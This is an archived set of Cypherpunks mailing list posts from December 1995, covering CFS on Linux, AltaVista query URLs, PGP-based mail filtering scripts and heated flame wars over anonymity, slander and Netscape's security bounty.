                          ---- 
 
 
The above is an excerpt from a 12 20 95 message to another list. 
 
 
Cordially, 
 
Jim 
 
 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Daniel S. Riley" <dsr@lns598.lns.cornell.edu>
Date: Mon, 25 Dec 1995 01:05:14 +0800
To: cypherpunks@toad.com
Subject: [Noise] Re: Alta Vista caches queries
In-Reply-To: <199512220220.DAA27203@utopia.hacktic.nl>
Message-ID: <9512241608.AA07620@lns100.lns.cornell.edu>
MIME-Version: 1.0
Content-Type: text/plain



In article <199512220220.DAA27203@utopia.hacktic.nl>
nobody@REPLAY.COM (Anonymous) writes:
nobody> I just stopped in on Digital's new Alta Vista page, and was
nobody> surprised to find that the query field was filled in--with a
nobody> search I ran 3 or 4 days ago.

The forms interface for Alta Vista uses METHOD="GET", which means the
parameters for the query are encoded in the URL, not transmitted
separately as they would be for METHOD="POST".  For example, a search
for "cypherpunks" sends a request for the URL

http://www.altavista.digital.com\
/cgi-bin/query?what=web&q=cypherpunks&Submit.x=0&Submit.y=0&pg=q

If I bookmark that URL and return to it later, Alta Vista will rerun
the query just as it did the first time (btw, the first two hits from
that search are detweiler pages).  On several visits to

http://www.altavista.digital.com/

I see no evidence that they are caching queries, so I suspect you
cached the query yourself by bookmarking a search result.

Of course, this does not mean that one shouldn't have the usual
privacy concerns that apply to any WWW service...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dan Harmon <harmon@tenet.edu>
Date: Mon, 25 Dec 1995 07:19:22 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: CFS and Linux (fwd)
In-Reply-To: <199512231640.LAA07020@jekyll.piermont.com>
Message-ID: <Pine.OSF.3.91.951224121240.29643B-100000@gaston.tenet.edu>
MIME-Version: 1.0
Content-Type: text/plain




On Sat, 23 Dec 1995, Perry E. Metzger wrote:

< elided>
> 
> Setting up and doing work on a new operating system is *WORK*. It
> takes time. It takes space in your lab or office. Maybe he just
> doesn't feel like spending that time, effort, and lab budget. Why
> should he? CFS is a GIFT. It isn't a product. Maybe if you paid
> someone to maintain a Linux version you would have one, but you aren't
> paying a penny. Quit looking a gift horse in the mouth.
> 
> .pm
> 

I concur it is work!!!! and very time consuming. And it also takes time 
away from other projects, and if you are like most of us we don't have 
enough time for our current projects.

Dan
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Mon, 25 Dec 1995 07:10:46 +0800
To: cypherpunks@toad.com
Subject: Re: AWARD: CHRISTMAS NET SCROOGE - AT&T & NETSCAPE??
Message-ID: <199512242051.MAA24295@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, it looks like somebody finally seconded my vote for AT&T &
Netscape to win the Christmas Net Scrooge Award.

His words were: "It makes me sick ... it's like the Nazi's sending out
the Brownshirts to break the windows for all the looters."

So, I'll just repost the entire nomination without any editing.

Even though I've gotten Christmas wish #2 (Bob Dole is NOT going to
Bosnia), I think it's still topical, since I'm still waiting on 
Christmas wish #1 and #3.

So ... just in case Santa is listening ... and since I already got
wish #2, rather than just bringing Peace on Earth and Goodwill to All
Men, which everybody asks for, anyhow -- could Santa do something about
the Big Bad Oil Companies who want to drill in the Arctic National
Wildlife Refuge??  

I _know_ that Santa wants to protect the sensitive tundra around his
Northern home. 

We all know that we aren't short of oil on the North American
continent, like the Big Bad Oil Companies would have us believe.  The
Canadian tar sands in Alberta have proven reserves larger than Saudi 
Arabia, and are already a proven technology, and Torch Energy out of 
Texas is already a player, there, I think.

No need to disturb the Wildlife.

Protecting some Cariboo, would be a right friendly Christmas present, 
from Santa, if he can pull some strings.  

Thanks Santa.  (if you're listening, I mean ...)

(And now, for the repost ...)

- - - - - - - - - - - - - - - - - - - - - 

Just in case, anyone missed this yesterday, I thought I'd
renominate AT&T & Netscape for the:

          *** 1995 CHRISTMAS NET SCROOGE ***

                    *** AWARD ***

    (T-shirt sales coming soon, to a website near you ...)

                     ------------

Alice here ...

Back on Tue, 19 Dec 1995, I wrote:

>>>Can anyone tell me whether Ian Goldberg and David Wagner got their
>>>$25,000 from Netscape for finding the HUGE security flaws in Netscape's
>>>existing product line??
>>>
>> >I can't remember whether they got anything or not ...
>> 
>> That would be no (well, except for the nifty T-shirt from Sameer; Thanks!).
> 
> Not anything??  That's shameful ... where on earth are the values in 
> America, today?  

Everyone should ask this question.  AT&T can sign-on to a two-page ad,
calling on Congress to balance the budget -- to cut off veterans, and
cut-off women with dependent children just before Christmas.  It can
sign on to this, but it can't bother to even offer a scholarship to
the students who helped make its fortunes.  It would rather leave the
impression that it freeloads off of other's efforts.

It's shameful.

> AT&T and Netscape have jointly made a small fortune distributing this
> product, and yet NEITHER company feels that the software engineers who
> "voluntarily" made a difference -- a couple of students -- deserve
> even a wooden nickel for the ideas which were used.
> 
> It's absolutely shameful.  But then, I guess that AT&T and Netscape
> have no shame at all.
> 
> They just steal "intellectual property" from students, and don't even
> pay a token amount.
> 
> And people wonder what's wrong with America?

Luckily for those of us who don't live in the United States, we can
perhaps look at that country and truly wonder what is going on over
there, and what is wrong with America?

Where are the values amongst ALL Americans, not just Netscape and
AT&T?  What are the role models that all the leaders -- business,
sports, and political leaders -- show to the national youth.

Here is all I've seen (as a foreigner), over the last while:

Enid Greene Waldholtz blubbering in a news conference about how she as
a congress person certainly COULDN'T be expected to resign after
winning her election with stolen money.  Blubbering for five hours
straight (except when she had to stop to turn a page, I mean) ... She
certainly said that "leadership" is all about playing "victim".  Poor
little Enid. (And even worse, she was _defended_ by Susan Molinari.)

Bob Dole, deciding to go to Bosnia.  The former WW II veteran
willingly jeopardizing the lives of American boys -- boys who have put
their lives on the line in a _volunteer_ armed force -- all for a
lousy political photo-op.  The chance to say ... "hey look at me, I'm
here in Bosnia."  Someone who's willing to overrule the Pentagon's own
most diplomatic advice on how complex an operation this actually is.

And then there is AT&T.  A company whose Chairman can publish a letter
which calls on Congress to cut off checks to mothers with dependent
children and war veterans days before Christmas, all while stealing
and freeloading off of the work of some students.

Scrooge ... take heart.

Here's Holiday wish #1.  Enid do the right thing ... resign.  Say the
"right thing" and say that your child -- the future and the delayed
gratification that the future brings -- is much more important than
your own personal PRESENT political aspirations.

Here's Holiday wish #2.  Bob, lots of people worked their asses off to
make sure that the American fighter pilot, and the two French fighter
pilots could be rescued from Bosnia.  If you want to go and get some
photo-ops, go to Germany or Italy, and give one hell of a vote of
support to the boys that are there -- a support which could just as
easily have been given and should be given in Congress.  A _real_
strong unfettered commitment.

And here's Holiday wish #3.  AT&T.  Do the right thing.  Reward those
people who help make you a fortune.  Stand tall as an example, rather
than as an embarrassment to the nation.  You've ignored this for so
long now, that you've almost dug your own grave.  But you still have a
chance to save face.  Have the courage to take the chance when it's
offered.  Simply say that the proposal to reward David Wagner and Ian
Goldberg -- some holiday mad money and scholarships -- was lost in
committee, and approval processes -- but it WAS in the works, and it
was recommended and can now be announced just before Christmas, as a
rightful reward.

Some holiday cheer.

Will people think it's a cynical attempt at manipulation?  Yep.  But
it's a darned sight better than the alternatives -- especially when you
look at possible future outcomes.  Trust me, this is far better than
calling for veterans and single mothers with children to be cut-off
just before the holidays.

Perhaps, Enid, Bob, and AT&T will all learn when to use offense and
when to use defense.  They might also learn that the best offense is a
good defense.  They might even begin to look at what "courage" truly
is, and of how difficult it can be for anyone to do the "right thing",
especially when they think that they're surrounded by minefields.  

Even when the "right thing" is in your own best interest, you not only
have to be shown the right path to take, but you have to have the
motivation and courage to make the move and take action.

Enid, Bob, and AT&T, take note.

Hopefully for the holidays, everyone finds the courage to neutralize
some portion of the vulnerability spectrum they've placed themselves
in.

> >   - Ian "There's a reason people talk about `starving grad students'..."
> > 


Alice de 'nonymous ...               <an455120@anon.penet.fi>


                                  ...just another one of those...


P.S.  This post is in the public domain.
                  C.  S.  U.  M.  O.  C.  L.  U.  N.  E.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Mon, 25 Dec 1995 07:19:06 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
In-Reply-To: <199512241606.IAA04460@slack.lne.com>
Message-ID: <NPLmgD8w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray <ericm@lne.com> writes:
>
> > That's what's wrong with the net in general. 10+ years ago, when I started
> > using it, it was hard to use e-mail and Usenet, so most of the people using
> >had to be fairly intelligent. Today, no intelligence is required to use e-ma
> > or even a cpunks anonymous remailer. I wish crypto software and mail filter
> > software followed the suit and became as easy to use and transparent at the
> > rest of our comm software.
>
> Long for the good old days of bang-paths, 300 baud acoustic couplers
> and UUCP maps?  see http://www.lne.com/lemay/writings/curmudgeonnet.html

Not at all -- I welcome all progress. My first modem was 110 bps.  When we
got a 300 bps one, it seemed lightning fast (and really cut down the LD bill
for the data calls to Virginia). In fact, I'm very happy that easy-to-use
Internet software enables people to use the net who couldn't do it before.
I've been telling all my non-computer acquaintances to get onto the net
for 5--8 years, but most of them did only in the last year or two.
I wish there was real easy privacy-enhancement software that every
"clueless newbie" could use. Maybe in PGP 3...

> Where we're headed is mail filters with PGP imbedded (PGP 3 will
> make this much easier) that check incoming mail for a valid signature
> for certain PGP keyid/fingerprints and pass that mail along.
> Other mail that doesn't match gets tossed into a 'junk' folder
> or thrown away if you really don't want to talk to anyone that you
> don't already know.

Alas, this is what the future net will be like. Some out-of-band
communication will be necessary before e-mail can be exchanged;
or perhaps there will be a protocol to enable Alice to write Bob
(who doesn't know Alice) and say: "You don't know me, but Carol
vouches that it's worth your while for you to read my e-mail."

Or Alice can ask Carol to e-mail Bob directly.

Is something like this already available for FTP? :)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@valhalla.phoenix.net (Anonymous)
Date: Mon, 25 Dec 1995 07:15:42 +0800
To: cypherpunks@toad.com
Subject: X-Mas-Pisswords
Message-ID: <199512241945.NAA06757@ valhalla.phoenix.net>
MIME-Version: 1.0
Content-Type: text/plain



Pseudonymous confusion.

S. Boxx and Sue D. Nym (and some others with short duration)
are proven historical nyms of Larry (Lance) Detweiler.
Vladimir S. Nuri is the going suspected (proven?) tentacle;
some believe he is Larry's better self. Dimitri Vulis seems
closely related letter-wise.

Alice originally drew attention when claiming that he had
found a 'huge hole' in Netscape (if configured to run
Postscript code). Alice (now with a penet address) is
claiming to be a Canadian and has knowledge supporting
that claim (according to other Canadians on the list).
He is still attacking Netscape (and ATT) now and then,
in between political causeries.

The obvious other Alice('s) posted for a short period
mainly to make a point about signatures.

Fred Cohen once(?) had a reputation as a virus expert,
being on the panel of various security conferences.
He has since obviously made many enemies on the firewall
list, and now also on this list. He is not a Canadian(?).
He shares Alice's concern for Postscript (and JAVA) on
the WWW but does not come anywhere near Alice in political
(occasionally rather funny) muck-raking.

Analysis of writing styles clearly outdistance Larry (Nuri,
Vulis) from (the Canadian) Alice. Fred and Alice are not
as easy to separate, especially when they are flaming, but
probably they are not the same.

Pissy





 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Mon, 25 Dec 1995 07:20:13 +0800
To: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Subject: Re: CFS and Linux
In-Reply-To: <1T7LgD3w165w@bwalk.dm.com>
Message-ID: <199512241852.NAA12570@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Dr. Dimitri Vulis writes:
> There's been a bit of confusion here. Perry Metzger stated that Matt Blaze
> doesn't have Linux and shouldn't support it.

I was incorrect that he didn't have Linux, but I stand by my position
that Matt is under no obligation to support anything, or even maintain
CFS at all. It's free software. Saying that someone is obligated to do
anything for free is repugnant. If he wants to support Linux better,
that's nice of him, but no one should bitch at him if he chooses not to
work for nothing for them.

One should thank Matt for being nice enough to do any of this AT ALL.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John K. Mackenzie" <jkm3@pipeline.com>
Date: Mon, 25 Dec 1995 07:17:10 +0800
To: cypherpunks@toad.com
Subject: Mailing list
Message-ID: <30DDD1E3.3A09@nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Put me on your list if you get anything started.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 07:08:17 +0800
To: cypherpunks@toad.com
Subject: Re: CFS and Linux
Message-ID: <199512242026.OAA02586@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> AT&T's refusal to support CFS and other so-called "secure" software
> under Linux is typical and to be expected.

This is the dumbest thread I've ever seen.

First of all, AT&T lets Matt distribute CFS and other crypto related tools
from an AT&T site.  In the current legal environment, I think that's a 
good show of "support".

Second of all, Matt has put in a lot of effort to make CFS usable to Linux
users.  I have personally gotten help on more than one occasion from Matt
with CFS and Linux, and I've seen him answer lots of questions on the CFS
users' mail list.

Here's an example:  when I first started using CFS, the documents were
formatted with a macro that wasn't included with the most popular linux
distributions.  I pointed this out to Matt and took the time to rewrite 
the docs using a different macro, so Linux users would be able to read 
it.  I'll bet he's done dozens of fixes to make CFS run better on Linux 
boxes.

What's more, Matt recently took the trouble to set up a Linux box for the
sole purpose of testing CFS on it. I love Linux and I use it, but the fact
that everyone has a slightly different distribution makes it a tough
platform to support.  As Matt's already pointed out, most of the problems
that people have with Linux and CFS seem to stem from a broken rpgen that
comes with some, but not all, distributions of Linux.

Finally, as Perry pointed out, neither Matt nor AT&T owe us anything, so
it would be impossible to find fault with Matt even if he hadn't done any
work to support Linux. 

Lots of people run CFS on Linux.  I'd even be willing to bet that Linux is 
the most popular CFS platform, judging from the traffic on the list.  If 
you can't run CFS on your Linux box, you might want to consider the 
possibility that you don't know what you're doing.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Mon, 25 Dec 1995 07:17:17 +0800
To: cypherpunks@toad.com
Subject: Jingling Bells
Message-ID: <199512241953.OAA15659@pipe4.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


That NY Times upbeat shopping report on gift-horse
laundering recalls Judeo-Christo-Muslim-Buddhist-whatever
X-marketing of indulgences to complicitously blessed
international drug-running bandit-patrons of days gone
by.

Battling the state for tax-whack is the grand legacy of
brawling twix cult and state. Tithe or tax, forgiveness
or the noose, adorable mass-murderer, theism or atheism,
no exit, you're hoisted.

It's a fine compact for building monuments to bedrugged
faith of earthly pleasures, temples and capitols, cons
spiritual blessing and caressing cons secular for
percentages generous.

Bedrugged with the rich history and rewarding journalism
of such back-scratching by gods of mammons galore, one
wonders how many Caribbean rimmers of yet unadvertized
international cults are now bulging their laundry sacks
cuts of the drugs.

To the cults of rome and jerusalem and mecca for
swamplords of rickety blow-downs, of scientologists
mimicking these venerable predecessors, add the ex-swiss
bankers now sweltering in hellish Cayman, the hot-eyed
ex-usa's with kids in college, sole-practitioner very
hungry beagles, all deeply inhaling the colombian aroma.

All offering mother goose refuge from Sam, off-shore, in
the cave of shadows, any world of illusory power where
you're willing to pay the stiff-arm dues for protective
delusion.

There's no fee meal like that served by god-mammon's own
earthly courtesans and courtiers sweet-and-sour abrading
innermost money=immortality fears.

CoS's E-meter-cleaner is dead-on for E-cash-drug
jingling bells.












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 07:09:04 +0800
To: cypherpunks@toad.com
Subject: corporate bashing
Message-ID: <199512242101.PAA02640@proust.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


There have been some recent posts here flaming AT&T, Netscape, and people 
like Matt and Jeff who work for them.  These posts seem to come out of a
paranoid mindset that distrusts any institution with power, and a 
romantic idea that the cypherpunks are subversive idealists fighting for 
truth and justice in the face of overwhelmingly powerful opponents.

The truth is that several important institutions have contributed a lot 
to the fight for privacy.  That may not be romantic, and it may not fit 
well with some people's adolescent fantasies, but it is what's actually 
happened.

The New York Times, the most influential paper in America, has 
consistently argued against censorship on the net.  

MIT, one of our most prestigious universities, has taken on the free
distribution of strong crypto tools and lent considerable credibility to
Phil Zimmermann. 

AT&T funded the research Matt Blaze did which demonstrated that a forge
chip would interoperate with an escrowed one.  If we had to pick one
single thing that killed clipper, it would probably be that
demonstration.

Netscape not only put crypto into its products, it's opening them up so
that they'll talk to other people's products.  This is a big step forward: 
even if Netscape caves into GAK, you'll be able to talk to one of Sameer's
Apache-SSL servers in the Netherlands.  GAK is unenforceable if standards 
are open and interoperability is possible.  And despite the complaints of 
many here, Netscape has taken a strong stand against GAK and ITAR.

Even Microsoft's Bill Gates has apparently written well and persuasively 
against GAK.

None of this is coincidental, and if you don't understand why you ought 
to read Friedman's "Capitalism and Freedom".

We are not extremists.  There is nothing extreme about believing that an
email you send to your spouse or your friend ought to be private, or that
people ought to be able to read and write about whatever subject interests
them.  The extremists are those who are fighting so hard to preserve the
possibility of totalitarianism.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: owner-cypherpunks@toad.com
Date: Mon, 25 Dec 1995 05:44:32 +0800
Subject: No Subject
Message-ID: <QQzvny09200.199512242137@relay2.UU.NET>
MIME-Version: 1.0
Content-Type: text/plain


Eric Murray wrote:

| Where we're headed is mail filters with PGP imbedded (PGP 3 will
| make this much easier) that check incoming mail for a valid signature
| for certain PGP keyid/fingerprints and pass that mail along.
| Other mail that doesn't match gets tossed into a 'junk' folder
| or thrown away if you really don't want to talk to anyone that you
| don't already know.

I agree with the assessment of where we may be going, but the
technology is available now.  (Marshall Rose uses it; if you want to
get mail into his private mailbox, offer him some $ via imbedded FV
authorizations in the mail, and it goes into his inbox.  If he thinks
it was worth his time, he doesn't charge you.)

Anyway, the code is definitely available now.  The back end is a
little kludgy, but it was needed for an auto key retrieval script.
This could easily be hacked to include a +pubring=$people line.  The
script gives you a keyid, which you can then use to filter on, ie:

:0BW
* -----BEGIN PGP
KEYID=|sender_unknown
# the sender unknown script is below

:0:
? [ $KEYID = (`cat .buddies`) ]
| /var/spool/mail/adam

:0e:
junk

#!/bin/sh
# unknown returns a keyid, exits 1 if the key is known
# $output is to get the exit status. Otherwise, this would be a one liner.
OUTPUT=`pgp -f +VERBOSE=0 +batchmode  -o /dev/null`
echo $OUTPUT | egrep -s 'not found in file'
EV=$? 
if [ $EV -eq 0 ]; then 
        echo $OUTPUT | awk '{print $6}' 
fi
exit $EV


-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 07:50:21 +0800
To: cp@proust.suba.com (Alex Strasheim)
Subject: Re: corporate bashing
In-Reply-To: <199512242101.PAA02640@proust.suba.com>
Message-ID: <9512242220.AA04636@all.net>
MIME-Version: 1.0
Content-Type: text


> We are not extremists.  There is nothing extreme about believing that an
> email you send to your spouse or your friend ought to be private, or that
> people ought to be able to read and write about whatever subject interests
> them.  The extremists are those who are fighting so hard to preserve the
> possibility of totalitarianism.

In that sense, many cypherpunks are not extremists, but in another
sense, many (most?) cypherpunks are.  They seem to believe that in the
Internet, slander is acceptable behavior and that anonymity should be
used as an escape from responsibility for what they do and say.  If you
want to remain free to speak your mind, you have to become responsible
in at least two ways:

	1 - You must stop slandering people.
	2 - You must stop using anonymity as a way to avoid being responsible.

When I say must, I am not intending to mean anything less.  If the
cypherpunks continue to do these two things, they will rapidly find that
they are doing more to destroy all of our rights to free speech in the
Internet than they ever did to encourage freedom of expression.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alex Strasheim <cp@proust.suba.com>
Date: Mon, 25 Dec 1995 08:16:13 +0800
To: fc@all.net (Fred Cohen)
Subject: Re: corporate bashing
In-Reply-To: <9512242220.AA04636@all.net>
Message-ID: <199512242356.RAA03010@proust.suba.com>
MIME-Version: 1.0
Content-Type: text


> 	1 - You must stop slandering people.
> 	2 - You must stop using anonymity as a way to avoid being responsible.

No.  

You must learn how to decide whether or not you want to believe something
by looking at its plausibility and where it came from, and when you do learn
that you need to realize that other people know how to do it as well. 

Don't blame anonymity for your own or others' inability to think critically.








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 25 Dec 1995 11:30:47 +0800
To: cypherpunks@toad.com
Subject: [Rant] Flame threads
Message-ID: <2.2b7.32.19951225030300.008f8cbc@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


Well, this is getting real unpleasant...  So far we have at least three
distinct flame threads going on and all of them are being pretty fucking
pointless.

I am going to address a few issues concerning this just to get them off my
chest and then I am going to drop the issue.

Alice and the Net Scrooge thread:

I agree that Netscape owes a bit more to people who help them out, but some
of your statements come from so far into left field that they are suffering
from lack of oxygen.  Where does AT&T come into the break of SSL and
Netscape?  AT&T may licence Netscape, but they do not own it.  As a licence,
I cannot see how they would bear any financial responsibility for fixes,
breaks or other security breaches.  The only reason I can see for the anger
directed against them is because they are a big company.  Still, your
arguments do not follow.

As for Netscape...  They have been trying pretty damn hard to clean up their
act.  They are actually FIXING bugs that are being reported and not just
forwarding them to Dave Null.  This is an incredible improvement over past
versions.  I think the IPO has had a positive effect because now they have
to act like a real company and have real quality control.  This is a good
thing!  Hopefully they will keep up the good work on bug fixes.  (We will
see if they have yet fixed the HP4 print header bug in 2.0b4 though...)

The Anti-Jeff/Matt/AT&T/Netscape thread:

People are not a wholly owned subsidiary of their company.  I judge people
by their actions and not who they work for.  Jeff Weinstein has worked
pretty hard to get things done right within Netscape.  That is not an easy
feat.  (I know this from experience.)  He may sound defensive at times, but
who would not after some of the shit he has to take from idiots who have no
clue as to what it takes to get things done in a corporate environment.  So
far he seems to be doing a pretty damn good job for Netscape and the crypto
community at large.

As for Matt Blaze.  He has done more for the crypto community as a whole
than most anyone I can name.  His accomplishments are pretty impressive.
Anyone who can break Clipper and describe the break in just eight pages
deserves a bit more credit than the anon-twits give him credit for. (Plus CFS
and the various other crypto code he maintains and distributes.)

So far the attacks on Jeff and Matt as being somehow corrupt seem more to
weaken any efforts this list has and not to help them.

Fred Cohen:

You have no respect for the freedom or opinions of others.  You expect the
net to operate under your terms and under your rules.  You want people to be
"responsible".  From what I have read here that seems to mean "punishable".
I do not like some of the flames I have seen, but I do not threaten legal action
against them. You have.  I have met the keeper of the list.  He is a very
nice guy and I would not want to see him go through hardship because of some
whacko with a fascist control complex.

Fred -- Go somewhere else.  I suggest you get together with Dan Gannon and
his ilk.  I think you will find him more to your liking.  (Or maybe the
$cientologists.  They are into suing anyone who disagrees with them. I am
sure they will help you start a list with your control fetishes in mind.
Maybe you can borrow a few of their lawyers.)

BTW, Fred has been killfiled on my mailreader. I am sick of listening to the
twit.  To understand what an honor this is...  He is the only person I have
killfiled on this or any mailinglist.

Sorry to inject this much noise to the list.  I am pretty damn hot over the
amount of shit I have waded through in the last few days.  The legal threats
from Fred were the final straw.  If toad.com ever needs financial support
fighting legal battles from twits such as Fred, they will have my support!

I know Perry will find all of this off topic.  It probably is...  It just
needed to be said due to my own peace of mind.

Back to the regular scheduled flamethrowing...




|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |  alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Fred Cohen)
Date: Mon, 25 Dec 1995 08:27:22 +0800
To: cypherpunks@toad.com
Subject: bashing (fwd)
Message-ID: <9512250004.AA08671@all.net>
MIME-Version: 1.0
Content-Type: text


Forwarded message:
>From fc Sun Dec 24 19:04:04 1995
Subject: bashing
To: cp@proust.suba.com (Alex Strasheim)
Date: Sun, 24 Dec 1995 19:04:04 -0500 (EST)
In-Reply-To: <199512242356.RAA03010@proust.suba.com> from "Alex Strasheim" at Dec 24, 95 05:56:44 pm
X-Mailer: ELM [version 2.4 PL22]
Content-Type: text
Content-Length: 1253      

> > 	1 - You must stop slandering people.
> > 	2 - You must stop using anonymity as a way to avoid being responsible.
> 
> No.  
> 
> You must learn how to decide whether or not you want to believe something
> by looking at its plausibility and where it came from, and when you do learn
> that you need to realize that other people know how to do it as well. 

I'm all for believing or not believing based on your understandings, but
this is not the same as slander or irresponsible behavior hidden behind
false identity.

I'm also in favor of anonymity, but not for the purpose of slander. 
There are a lot of good and valid reasons for anonymity, and I believe
that it is a basic requirement of freedom, but we will lose the ability
to be anonymous if enough of us abuse the freedom.

> Don't blame anonymity for your own or others' inability to think critically.

I don't and didn't blame anonymity for this.  I blame people who hide
behind anonymity as a way to be irresponsible without apparent recourse. 

Evaluating statements and giving your opinion is not the same as making
insulting, untrue, and crude remarks about individuals.

-> See: Info-Sec Heaven at URL http://all.net/
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 25 Dec 1995 09:59:31 +0800
To: Fred Cohen <fc@all.net>
Subject: Re: bashing (fwd)
In-Reply-To: <9512250004.AA08671@all.net>
Message-ID: <Pine.SV4.3.91.951224203026.11836A-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain



> Evaluating statements and giving your opinion is not the same as making
> insulting, untrue, and crude remarks about individuals.

   So Fred, I gather that you believe that there is an absolute metric of
insultingness, of untruthfulness, of crudeness.

  Possibly you think that you, Fred Cohen, are a good judge of these
things, or that you know who to trust, to delegate these measurements to? 

  Yes, Fred, please do act now to ensure that other Netters are held to 
the standards you propose. Perhaps you can propose a law that will 
enforce your will?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Sun, 24 Dec 1995 19:03:42 +0800
To: andr0id@midwest.net (Jason Rentz)
Subject: Re: ex encrypted script
In-Reply-To: <199512202339.RAA05220@cdale1.midwest.net>
Message-ID: <199512241046.VAA06529@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


Hello andr0id@midwest.net (Jason Rentz)
  and Cypherpunks

Dr0id wrote:
> I have several simple scripts that are simple yet handle important realtime
> call processing tasks and remote control operations.  These programs are my
> programs but are running on a system that is dialed into by the vendor once
> in a while.  

The problem will be that a superuser can do just about anything...

> Is there a way to encrypt a script yet still allow it to be runnable?  I
...

Well, what's wrong with 
  pgp -f | /bin/sh
? Obviously, it still decrypts before use, and may or may not be
useful depending on your application, but it never has a file with
the unencrypted script around.

> I thought of a few simple protections but they all involve decrypting before
> running.

It depends on what you want to prevent: copying the scripts, running 
them, understanding them, or what?

To prevent copying/running them, you can use the above script, but
you'll have to type in the passphrase each time (checking that no one
is watching you, which is impossible with a determined su).

If you just want them to not understand, obfuscation should suffice.
(But reverse-engineering can still be applied.)


(On the "supply useless source" subthread, it is possible to define
the term "source code" so as to disallow such obfuscation. See the
GNU GPL ("copyleft") licence for an example.)

Adiau

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Mon, 25 Dec 1995 09:33:26 +0800
To: cypherpunks@toad.com
Subject: Re: PGP timeline FAQ... comments requested
Message-ID: <199512250123.UAA18523@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 22 Dec 95 13:37:35 GMT, you wrote:

[..]

Great job. A couple of suggestions...

Version histories, with differences in each version. Also good to
debunk the "PGP before version x isn't safe to use" myth.  Might also
want to throw in info about PGP hacks (mainly outside US), development
of other software like SecureDrive, SFS, HPack (an archiver that uses
PGP keys for digital signatures of files or encryption), development
of anonymous remailers that use PGP, and even something about planned
future developments (PGP 3.0, PGPPhone, etc...)


>Long live the Pretty Good revolution,

>Adam Back <aba@dcs.ex.ac.uk>


Merry solstice,

--Mutant Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 25 Dec 1995 14:56:28 +0800
To: Brian Davis <bdavis@thepoint.net>
Subject: Re: Fred Cohen: Re: CFS and Linux
In-Reply-To: <Pine.BSF.3.91.951224042445.20498A-100000@mercury.thepoint.net>
Message-ID: <Pine.BSD.3.91.951225020645.6606A-100000@usr4.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Brian:

    	There is no way Cohen can send the police to confiscate toad.com, or
    any other computer without some form of criminal complaint --other 
    than by himself as citizen whistle-blower.

	I read the situation as Cohen was planning to attempt to make the
    actions a _criminal_ conspiracy. _If_ Cohen was successful in
    convincing either a state or Federal DA to seek a grand jury
    indictment, then the local police or the federal marshals could be
    issued a search warrant to collect evidence. 

	I can see Cohen trying to present his case before the Federal 
    bench! In fact, I might be willing to pay admission.  Cohen lives in
    Hudson OH which is also the location of his private <all.net>. Hudson
    is in Summit County and Akron (the county seat) has a branch court of
    the 4th Federal District (or used to).

	In West Virginia hill towns they teach the 3Rs: reading, 'riting,
    and the route to Akron, which is referred to as the capital of West
